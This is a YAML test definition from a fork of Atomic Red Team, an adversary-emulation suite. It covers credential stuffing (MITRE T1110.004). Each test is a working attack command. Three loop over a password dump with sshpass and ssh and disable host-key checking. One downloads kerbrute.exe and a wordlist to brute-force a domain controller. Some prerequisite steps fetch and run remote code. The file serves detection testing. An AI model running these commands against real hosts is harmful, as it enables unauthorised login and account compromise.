adam/atomic-red-team-gs
1
0
Fork 0
Code Issues Pull Requests Actions Packages Projects Releases Wiki Activity
Files
62a85c12b51a6d903a8357cb91b555ff1b203fd3
atomic-red-team-gs/atomics/T1110.004/T1110.004.yaml
T
Hare Sudhan 62a85c12b5 FreeBSD changes (#2585) 
* freebsd changes

* renaming freebsd to linux
2023-11-06 17:41:43 -05:00

135 lines
5.1 KiB
YAML
Raw Blame History

attack_technique: T1110.004
display_name: 'Brute Force: Credential Stuffing'
atomic_tests:
- name: SSH Credential Stuffing From Linux
auto_generated_guid: 4f08197a-2a8a-472d-9589-cd2895ef22ad
description: |
Using username,password combination from a password dump to login over SSH.
supported_platforms:
- linux
input_arguments:
target_host:
description: IP Address / Hostname you want to target.
type: string
default: localhost
dependency_executor_name: bash
dependencies:
- description: |
Requires SSHPASS
prereq_command: |
if [ -x "$(command -v sshpass)" ]; then exit 0; else exit 1; fi;
get_prereq_command: |
if [ $(cat /etc/os-release | grep -i ID=ubuntu) ] || [ $(cat /etc/os-release | grep -i ID=kali) ]; then sudo apt update && sudo apt install sshpass -y; else echo "This test requires sshpass" ; fi ;
executor:
name: bash
elevation_required: false
command: |
cp "$PathToAtomicsFolder/T1110.004/src/credstuffuserpass.txt" /tmp/
for unamepass in $(cat /tmp/credstuffuserpass.txt);do sshpass -p `echo $unamepass | cut -d":" -f2` ssh -o 'StrictHostKeyChecking=no' `echo $unamepass | cut -d":" -f1`@#{target_host};done
- name: SSH Credential Stuffing From MacOS
auto_generated_guid: d546a3d9-0be5-40c7-ad82-5a7d79e1b66b
description: |
Using username,password combination from a password dump to login over SSH.
supported_platforms:
- macos
input_arguments:
target_host:
description: IP Address / Hostname you want to target.
type: string
default: localhost
dependency_executor_name: bash
dependencies:
- description: |
Requires SSHPASS
prereq_command: |
if [ -x "$(command -v sshpass)" ]; then exit 0; else exit 1; fi;
get_prereq_command: |
/bin/bash -c "$(curl -fsSL https://raw.githubusercontent.com/Homebrew/install/e8114640740938c20cc41ffdbf07816b428afc49/install.sh)"
brew install hudochenkov/sshpass/sshpass
executor:
name: bash
elevation_required: false
command: |
cp "$PathToAtomicsFolder/T1110.004/src/credstuffuserpass.txt" /tmp/
for unamepass in $(cat /tmp/credstuffuserpass.txt);do sshpass -p `echo $unamepass | cut -d":" -f2` ssh -o 'StrictHostKeyChecking=no' `echo $unamepass | cut -d":" -f1`@#{target_host};done
- name: SSH Credential Stuffing From FreeBSD
auto_generated_guid: a790d50e-7ebf-48de-8daa-d9367e0911d4
description: |
Using username,password combination from a password dump to login over SSH.
supported_platforms:
- linux
input_arguments:
target_host:
description: IP Address / Hostname you want to target.
type: string
default: localhost
dependency_executor_name: sh
dependencies:
- description: |
Requires SSHPASS
prereq_command: |
if [ -x "$(command -v sshpass)" ]; then exit 0; else exit 1; fi;
get_prereq_command: |
pkg install -y sshpass
executor:
name: sh
elevation_required: false
command: |
cp $PathToAtomicsFolder/T1110.004/src/credstuffuserpass.txt /tmp/
for unamepass in $(cat /tmp/credstuffuserpass.txt);do sshpass -p `echo $unamepass | cut -d":" -f2` ssh -o 'StrictHostKeyChecking=no' `echo $unamepass | cut -d":" -f1`@#{target_host};done
- name: Brute Force:Credential Stuffing using Kerbrute Tool
auto_generated_guid: 4852c630-87a9-409b-bb5e-5dc12c9ebcde
description: |
Will read username and password combos from a file or stdin (format username:password) and perform a bruteforce attack
supported_platforms:
- windows
input_arguments:
domaincontroller:
description: Domain controller where test will be run
type: string
default: $ENV:userdnsdomain
domain:
description: Domain where you will be testing
type: string
default: $ENV:userdomain
dependency_executor_name: powershell
dependencies:
- description: |
kerbrute.exe must exist in PathToAtomicsFolder\..\ExternalPayloads
prereq_command: |
if (test-path "PathToAtomicsFolder\..\ExternalPayloads\kerbrute.exe"){exit 0} else {exit 1}
get_prereq_command: |
New-Item -Type Directory "PathToAtomicsFolder\..\ExternalPayloads\" -ErrorAction Ignore -Force | Out-Null
invoke-webrequest "https://github.com/ropnop/kerbrute/releases/download/v1.0.3/kerbrute_windows_386.exe" -outfile "PathToAtomicsFolder\..\ExternalPayloads\kerbrute.exe"
- description: |
bruteforce.txt must exist in PathToAtomicsFolder\..\ExternalPayloads
prereq_command: |
if (test-path "PathToAtomicsFolder\..\ExternalPayloads\bruteforce.txt"){exit 0} else {exit 1}
get_prereq_command: |
New-Item -Type Directory "PathToAtomicsFolder\..\ExternalPayloads\" -ErrorAction Ignore -Force | Out-Null
invoke-webrequest "https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1110.004/src/bruteforce.txt?raw=true" -outfile "PathToAtomicsFolder\..\ExternalPayloads\bruteforce.txt"
executor:
name: powershell
elevation_required: false
command: |
cd "PathToAtomicsFolder\..\ExternalPayloads"
.\kerbrute.exe bruteforce --dc #{domaincontroller} -d #{domain} "PathToAtomicsFolder\..\ExternalPayloads\bruteforce.txt"
Reference in New Issue View Git Blame Copy Permalink